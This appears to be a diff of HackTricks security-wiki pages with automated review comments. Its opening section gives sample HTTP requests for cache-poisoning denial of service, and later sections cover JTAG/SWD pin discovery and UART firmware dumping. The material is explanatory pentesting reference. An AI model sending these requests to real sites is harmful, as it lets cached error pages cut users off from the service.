Send a header that contain some **harmfull meta characters** such as `\n` and `\r`. In order the attack to work you must bypass the cache first.
|
||||||
|
|
||||||
|
```
|
||||||
|
GET / HTTP/1.1
|
||||||
|
Host: redacted.com
|
||||||
|
X-Meta-Hedear:Bad Chars\n \r
|
||||||
|
```
|
||||||
|
|
||||||
|
A badly configured header could be just `\:` as a header.
|
||||||
|
|
||||||
|
This could also work if unexpected values are sent, like an unexpected Content-Type:
|
||||||
|
|
||||||
|
```
|
||||||
|
GET /anas/repos HTTP/2
|
||||||
|
Host: redacted.com
|
||||||
|
Content-Type: HelloWorld
|
||||||
|
```
|
||||||
|
|
||||||
|
* **Unkeyed header**
|
||||||
|
|
||||||
|
Some websites will return an error status code if they **see some specific headers i**n the request like with the _X-Amz-Website-Location-Redirect: someThing_ header:
|
||||||
|
|
||||||
|
```
|
||||||
|
GET /app.js HTTP/2
|
||||||
|
Host: redacted.com
|
||||||
|
X-Amz-Website-Location-Redirect: someThing
|
||||||
|
|
||||||
|
HTTP/2 403 Forbidden
|
||||||
|
Cache: hit
|
||||||
|
|
||||||
|
Invalid Header
|
||||||
|
```
|
||||||
|
|
||||||
|
* **HTTP Method Override Attack (HMO)**
|
||||||
|
|
||||||
|
If the server supports changing the HTTP method with headers such as `X-HTTP-Method-Override`, `X-HTTP-Method` or `X-Method-Override`. It's possible to request a valid page changing the method so the server doesn't supports it so a bad response gets cached:
|
||||||
|
|
||||||
|
```
|
||||||
|
GET /blogs HTTP/1.1
|
||||||
|
Host: redacted.com
|
||||||
|
HTTP-Method-Override: POST
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
* **Unkeyed Port**
|
||||||
|
|
||||||
|
If port in the Host header is reflected in the response and not included in the cache key, it's possible to redirect it to an unused port:
|
||||||
|
|
||||||
|
```
|
||||||
|
GET /index.html HTTP/1.1
|
||||||
|
Host: redacted.com:1
|
||||||
|
|
||||||
|
HTTP/1.1 301 Moved Permanently
|
||||||
|
Location: https://redacted.com:1/en/index.html
|
||||||
|
Cache: miss
|
||||||
|
```
|
||||||
|
|
||||||
|
* **Long Redirect DoS**
|
||||||
|
|
||||||
|
Like in the following example, x is not being cached, so an attacker could abuse the redirect response behaviour to make the redirect send a URL so big that it returns an error. Then, people trying to access the URL without the uncached x key will get the error response:
|
||||||
|
|
||||||
|
```
|
||||||
|
GET /login?x=veryLongUrl HTTP/1.1
|
||||||
|
Host: www.cloudflare.com
|
||||||
|
|
||||||
|
HTTP/1.1 301 Moved Permanently
|
||||||
|
Location: /login/?x=veryLongUrl
|
||||||
|
Cache: hit
|
||||||
|
|
||||||
|
GET /login/?x=veryLongUrl HTTP/1.1
|
||||||
|
Host: www.cloudflare.com
|
||||||
|
|
||||||
|
HTTP/1.1 414 Request-URI Too Large
|
||||||
|
CF-Cache-Status: miss
|
||||||
|
```
|
||||||
|
|
||||||
|
* **Host header case normalization**
|
||||||
|
|
||||||
|
The host header should be case insensitive but some websites expect it to be lowercase returning an error if it's not:
|
||||||
|
|
||||||
|
```
|
||||||
|
GET /img.png HTTP/1.1
|
||||||
|
Host: Cdn.redacted.com
|
||||||
|
|
||||||
|
HTTP/1.1 404 Not Found
|
||||||
|
Cache:miss
|
||||||
|
|
||||||
|
Not Found
|
||||||
|
```
|
||||||
|
|
||||||
|
* **Path normalization**
|
||||||
|
|
||||||
|
Some pages will return error codes sending data URLencode in the path, however, the cache server with URLdecode the path and store the response for the URLdecoded path:
|
||||||
|
|
||||||
|
```
|
||||||
|
GET /api/v1%2e1/user HTTP/1.1
|
||||||
|
Host: redacted.com
|
||||||
|
|
||||||
|
|
||||||
|
HTTP/1.1 404 Not Found
|
||||||
|
Cach:miss
|
||||||
|
|
||||||
|
Not Found
|
||||||
|
```
|
||||||
|
|
||||||
|
* **Fat Get**
|
||||||
|
|
||||||
|
Some cache servers, like Cloudflare, or web servers, stops GET requests with a body, so this oucld be abused to cache a invalid response:
|
||||||
|
|
||||||
|
```
|
||||||
|
GET /index.html HTTP/2
|
||||||
|
Host: redacted.com
|
||||||
|
Content-Length: 3
|
||||||
|
|
||||||
|
xyz
|
||||||
|
|
||||||
|
|
||||||
|
HTTP/2 403 Forbidden
|
||||||
|
Cache: hit
|
||||||
|
```
|
||||||
|
|
||||||
|
## References
|
||||||
|
|
||||||
|
* [https://anasbetis023.medium.com/dont-trust-the-cache-exposing-web-cache-poisoning-and-deception-vulnerabilities-3a829f221f52](https://anasbetis023.medium.com/dont-trust-the-cache-exposing-web-cache-poisoning-and-deception-vulnerabilities-3a829f221f52)
|
||||||
|
* [https://youst.in/posts/cache-poisoning-at-scale/?source=post\_page-----3a829f221f52--------------------------------](https://youst.in/posts/cache-poisoning-at-scale/?source=post\_page-----3a829f221f52--------------------------------)
|
||||||
|
|
||||||
|
<details>
|
||||||
|
|
||||||
|
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||||
|
|
||||||
|
Other ways to support HackTricks:
|
||||||
|
|
||||||
|
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||||
|
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||||
|
|
||||||
|
</details>
|
|
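Review bot: the HMO example uses `HTTP-Method-Override: POST`, which is none of the three header names the paragraph above it lists (`X-HTTP-Method-Override`, `X-HTTP-Method` or `X-Method-Override`); either add it to the list or use one of the listed names in the example so the two agree. Several typos in the new file should be fixed before merge: `Hedear` in `X-Oversize-Hedear` and `X-Meta-Hedear` (arbitrary names, but spell "Header"), `harmfull`, `oucld`, `a invalid response`, `Cach:miss`, `doesn't supports it`, `In order the attack to work` and `the cache server with URLdecode the path` (should be "will URL-decode"). Two sentences also need a clarity pass: `In order the attack to work you must bypass the cache first` should say that the malformed request has to reach the origin (a cached copy would otherwise be served and no error would be produced), and `x is not being cached` in the Long Redirect DoS item means "x is not part of the cache key", which is the point of the example.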
@ -23,7 +23,7 @@ Nowadays **web** **applications** usually **uses** some kind of **intermediary**
|
||||||
{% endhint %}
|
{% endhint %}
|
||||||
|
|
||||||
* [ ] [**Abusing hop-by-hop headers**](abusing-hop-by-hop-headers.md)
|
* [ ] [**Abusing hop-by-hop headers**](abusing-hop-by-hop-headers.md)
|
||||||
* [ ] [**Cache Poisoning/Cache Deception**](cache-deception.md)
|
* [ ] [**Cache Poisoning/Cache Deception**](cache-deception/)
|
||||||
* [ ] [**HTTP Request Smuggling**](http-request-smuggling/)
|
* [ ] [**HTTP Request Smuggling**](http-request-smuggling/)
|
||||||
* [ ] [**H2C Smuggling**](h2c-smuggling.md)
|
* [ ] [**H2C Smuggling**](h2c-smuggling.md)
|
||||||
* [ ] [**Server Side Inclusion/Edge Side Inclusion**](server-side-inclusion-edge-side-inclusion-injection.md)
|
* [ ] [**Server Side Inclusion/Edge Side Inclusion**](server-side-inclusion-edge-side-inclusion-injection.md)
|
||||||
|
|
|
@ -1,4 +1,4 @@
|
||||||
|
# Hardware Hacking
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
|
@ -9,15 +9,12 @@ Other ways to support HackTricks:
|
||||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
|
## JTAG
|
||||||
#
|
|
||||||
|
|
||||||
# JTAG
|
|
||||||
|
|
||||||
JTAG allows to perform a boundary scan. The boundary scan analyzes certain circuitry, including embedded boundary-scan cells and registers for each pin.
|
JTAG allows to perform a boundary scan. The boundary scan analyzes certain circuitry, including embedded boundary-scan cells and registers for each pin.
|
||||||
|
|
||||||
|
@ -34,7 +31,7 @@ It can also support other commands such as:
|
||||||
|
|
||||||
You might come across these instructions when you use a tool like the JTAGulator.
|
You might come across these instructions when you use a tool like the JTAGulator.
|
||||||
|
|
||||||
## The Test Access Port
|
### The Test Access Port
|
||||||
|
|
||||||
Boundary scans include tests of the four-wire **Test Access Port (TAP)**, a general-purpose port that provides **access to the JTAG test support** functions built into a component. TAP uses the following five signals:
|
Boundary scans include tests of the four-wire **Test Access Port (TAP)**, a general-purpose port that provides **access to the JTAG test support** functions built into a component. TAP uses the following five signals:
|
||||||
|
|
||||||
|
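Review bot: demoting `## The Test Access Port` to `###` is consistent with the new `# Hardware Hacking` title and `## JTAG` section, but the context line it sits above is internally inconsistent: it introduces the `four-wire **Test Access Port (TAP)**` and then says `TAP uses the following five signals`. Since the fifth signal in IEEE 1149.1 is optional, wording it as "four mandatory signals plus an optional fifth" would reconcile the two.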
@ -46,25 +43,24 @@ Boundary scans include tests of the four-wire **Test Access Port (TAP)**, a gene
|
||||||
|
|
||||||
Sometimes you will be able to find those pins marked in the PCB. In other occasions you might need to **find them**.
|
Sometimes you will be able to find those pins marked in the PCB. In other occasions you might need to **find them**.
|
||||||
|
|
||||||
## Identifying JTAG pins
|
### Identifying JTAG pins
|
||||||
|
|
||||||
The fastest but most expensive way to detect JTAG ports is by using the **JTAGulator**, a device created specifically for this purpose (although it can **also detect UART pinouts**).
|
The fastest but most expensive way to detect JTAG ports is by using the **JTAGulator**, a device created specifically for this purpose (although it can **also detect UART pinouts**).
|
||||||
|
|
||||||
It has **24 channels** you can connect to the boards pins. Then it performs a **BF attack** of all the possible combinations sending **IDCODE** and **BYPASS** boundary scan commands. If it receives a response, it displays the channel corresponding to each JTAG signal
|
It has **24 channels** you can connect to the boards pins. Then it performs a **BF attack** of all the possible combinations sending **IDCODE** and **BYPASS** boundary scan commands. If it receives a response, it displays the channel corresponding to each JTAG signal
|
||||||
|
|
||||||
A cheaper but much slower way of identifying JTAG pinouts is by using the [**JTAGenum**](https://github.com/cyphunk/JTAGenum/) loaded on an Arduino-compatible microcontroller.
|
A cheaper but much slower way of identifying JTAG pinouts is by using the [**JTAGenum**](https://github.com/cyphunk/JTAGenum/) loaded on an Arduino-compatible microcontroller.
|
||||||
|
|
||||||
Using **JTAGenum**, you’d first **define the pins of the probing** device that you’ll use for the enumeration.You’d have to reference the device’s pinout diagram, and then connect these pins with the test points on your target device.
|
Using **JTAGenum**, you’d first **define the pins of the probing** device that you’ll use for the enumeration.You’d have to reference the device’s pinout diagram, and then connect these pins with the test points on your target device.
|
||||||
|
|
||||||
A **third way** to identify JTAG pins is by **inspecting the PCB** for one of the pinouts. In some cases, PCBs might conveniently provide the **Tag-Connect interface**, which is a clear indication that the board has a JTAG connector, too. You can see what that interface looks like at [https://www.tag-connect.com/info/](https://www.tag-connect.com/info/). Additionally, inspecting the **datasheets of the chipsets on the PCB** might reveal pinout diagrams that point to JTAG interfaces.
|
A **third way** to identify JTAG pins is by **inspecting the PCB** for one of the pinouts. In some cases, PCBs might conveniently provide the **Tag-Connect interface**, which is a clear indication that the board has a JTAG connector, too. You can see what that interface looks like at [https://www.tag-connect.com/info/](https://www.tag-connect.com/info/). Additionally, inspecting the **datasheets of the chipsets on the PCB** might reveal pinout diagrams that point to JTAG interfaces.
|
||||||
|
|
||||||
# SDW
|
## SDW
|
||||||
|
|
||||||
SWD is an ARM-specific protocol designed for debugging.
|
SWD is an ARM-specific protocol designed for debugging.
|
||||||
|
|
||||||
The SWD interface requires **two pins**: a bidirectional **SWDIO** signal, which is the equivalent of JTAG’s **TDI and TDO pins and a clock**, and **SWCLK**, which is the equivalent of **TCK** in JTAG. Many devices support the **Serial Wire or JTAG Debug Port (SWJ-DP)**, a combined JTAG and SWD interface that enables you to connect either a SWD or JTAG probe to the target.
|
The SWD interface requires **two pins**: a bidirectional **SWDIO** signal, which is the equivalent of JTAG’s **TDI and TDO pins and a clock**, and **SWCLK**, which is the equivalent of **TCK** in JTAG. Many devices support the **Serial Wire or JTAG Debug Port (SWJ-DP)**, a combined JTAG and SWD interface that enables you to connect either a SWD or JTAG probe to the target.
<details>
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
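Review bot: the heading in this hunk changes level to `## SDW` but keeps the misspelled name; the body line directly under it describes SWD, so the heading should read `## SWD` to match the protocol it introduces. In the same hunk the pin description "a bidirectional **SWDIO** signal, which is the equivalent of JTAG's **TDI and TDO pins and a clock**, and **SWCLK**" misplaces "and a clock"; suggest "a bidirectional **SWDIO** signal, the equivalent of JTAG's **TDI and TDO** pins, and a clock, **SWCLK**, the equivalent of **TCK**". The JTAGenum sentence is also missing a space after "enumeration.".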
@ -74,9 +70,7 @@ Other ways to support HackTricks:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
</details>
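Review bot: the only textual change visible in this hunk is the Twitter link going from `hacktricks_live` to `hacktricks\_live`, and neither side fixes the real inconsistency on that line: the link text shows `@carlospolopm` while the destination is `https://twitter.com/hacktricks_live`, so handle and URL disagree and one of them should be corrected. The backslash before the underscore looks like editor auto-escaping rather than an intended edit; since the hunk shrinks from 9 to 7 lines, the commit message should say which two lines were dropped.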
@ -165,6 +165,32 @@ AAA Hi Dreg! AAA
waiting a few secs to repeat....
waiting a few secs to repeat....
```
```
## Dumping Firmware with UART Console
UART Console provides a great way to work with the underlying firmware in runtime environment. But when the UART Console access is read-only, it might introduce a lot of constrains. In many embedded devices, the firmware is stored in EEPROMs and executed in processors that have volatile memory. Hence, the firmware is kept read-only since the original firmware during manufacturing is inside the EEPROM itself and any new files would get lost due to volatile memory. Hence, dumping firmware is a valuable effort while working with embedded firmwares.
There are a lot of ways to do this and the SPI section covers methods to extract firmware directly from the EEPROM with various devices. Although, it is recommended to first try dumping firmware with UART since dumping firmware with physical devices and external interactions can be risky.
Dumping firmware from UART Console requires first getting access to bootloaders. Many popular vendors make use of <b>uboot</b> (Universal Bootloader) as their bootloader to load Linux. Hence, getting access to <b>uboot</b> is necessary.
To get access to <b>boot</b> bootloader, connect the UART port to the computer and use any of the Serial Console tools and keep the power supply to the device disconnected. Once the setup is ready, press the Enter Key and hold it. Finally, connect the power supply to the device and let it boot.
Doing this will interrupt <b>uboot</b> from loading and will provide a menu. It is recommended to understand <b>uboot</b> commands and using help menu to list them. This might be `help` command. Since different vendors use different configurations, it is necessary to understand each of them seperately.
Usually, the command to dump the firmware is:
```
md
```
which stands for "memory dump". This will dump the memory (EEPROM Content) on the screen. It is recommended to log the Serial Console output before starting the proceedure to capture the memory dump.
Finally, just strip out all the unnecessary data from the log file and store the file as `filename.rom` and use binwalk to extract the contents:
```
binwalk -e <filename.rom>
```
This will list the possible contents from the EEPROM as per the signatures found in the hex file.
Although, it is necessary to note that it's not always the case that the <b>uboot</b> is unlocked even if it is being used. If the Enter Key doesn't do anything, check for different keys like Space Key, etc. If the bootloader is locked and does not get interrupted, this method would not work. To check if <b>uboot</b> is the bootloader for the device, check the output on the UART Console while booting of the device. It might mention <b>uboot</b> while booting.
<details>
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
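Review bot: the new "Dumping Firmware with UART Console" section shows the dump command as a bare `md`, which is not reproducible as written: U-Boot's `md` takes an address and an object count (`md[.b|.w|.l] address [count]`), and the text never says which address range the reader should dump, nor that on boards with SPI NOR the flash is usually not memory-mapped and has to be read into RAM first (`sf probe` / `sf read`) before `md` shows anything useful. The `binwalk -e <filename.rom>` step is also missing a conversion: the serial log is ASCII hex, so renaming it to `.rom` does not give binwalk the binary image it signature-scans; add a step that converts the hex dump to raw bytes. Smaller fixes in the same hunk: "To get access to <b>boot</b> bootloader" should read `<b>uboot</b>` (the project name is U-Boot), the EEPROM/volatile-memory paragraph conflates a read-only console with read-only storage and should be reworded, `constrains`, `seperately`, `proceedure` and `firmwares` are misspelled, "Although, it is recommended" should be "However, it is recommended", and the section uses HTML `<b>` where the rest of this page uses markdown `**`.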
@ -9,7 +9,7 @@ Other ways to support HackTricks:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
</details>
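Review bot: the Twitter line is the only change in this hunk (`hacktricks_live` to `hacktricks\_live`), and it leaves the link text `@carlospolopm` pointing at `https://twitter.com/hacktricks_live`; pick one handle and use it for both the text and the URL. Since the same escaped-underscore change appears in several files of this merge, it should be confirmed as intentional rather than an editor artifact.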
@ -105,17 +105,21 @@ You won't find HackTricks filled with annoying ads like other blogs with much le
* **What should I do if there is content from my blog in HackTricks and I don't want it there?**
* **What should I do if there is content from my blog in HackTricks and I don't want it there?**
{% endhint %}
{% endhint %}
In any case know that HackTricks in this case would be improving your **SEO** and **encouraging** people to **check your page** (people has mentioned us that since some page of them is in HackTricks they receive more visits). If you still want the content of your blog to be removed from HackTricks let us know.
Note that having links to your page in HackTricks:
Note that asking this we will definitely **remove every link to your blog**, and any content based on it.
* Improve your **SEO**
* The content gets **translated to more than 15 languages** making possible for more people to access this content
* **HackTricks encourages** people to **check your page** (several people has mentioned us that since some page of them is in HackTricks they receive more visits)
However, If you still want the content of your blog to be removed from HackTricks just let us know and we will definitely **remove every link to your blog**, and any content based on it.
{% hint style="danger" %}
{% hint style="danger" %}
* **What should I do if I find copy-pasted content in HackTricks?**
* **What should I do if I find copy-pasted content in HackTricks?**
{% endhint %}
{% endhint %}
**Unfortunatelly this practice might have happened in the beginning of the project when this page was just the notes of a pentester**. We always try to **give the original authors all the credits**. If you find a page with copy-pasted content (even with the original source referenced), let us know and we will either **remove it**, **leave the link**, or **rewrite it**.
We always **give the original authors all the credits**. If you find a page with copy-pasted content without original source referenced, let us know and we will either **remove it**, **add the link before the text**, or **rewrite it adding the link**.
## LICENSE 
## LICENSE
Copyright © All rights reserved unless otherwise specified.
Copyright © All rights reserved unless otherwise specified.
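Review bot: the new bullet list in this hunk carries grammar errors that the rewrite should fix before merging: "several people has mentioned us that since some page of them is in HackTricks" should read "several people have told us that since one of their pages is in HackTricks", "making possible for more people to access this content" should read "making it possible for more people to access this content", and "However, If you still want" should use a lowercase "if". The replacement of "Unfortunatelly this practice might have happened..." with the shorter credit statement is an improvement; the new sentence "let us know and we will either **remove it**, **add the link before the text**, or **rewrite it adding the link**" could be tightened to "rewrite it with the link added".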
@ -161,7 +165,7 @@ Other ways to support HackTricks:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
</details>
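Review bot: same point as for the earlier support-list hunk of this file: the only change is `hacktricks_live` to `hacktricks\_live` in the Twitter URL, while the link text on that line still reads `@carlospolopm`; the text and the destination should name the same account. Because this footer block is duplicated at line 9 and line 165 of the same file, any handle fix needs to be applied to both copies in one commit so they do not drift apart again.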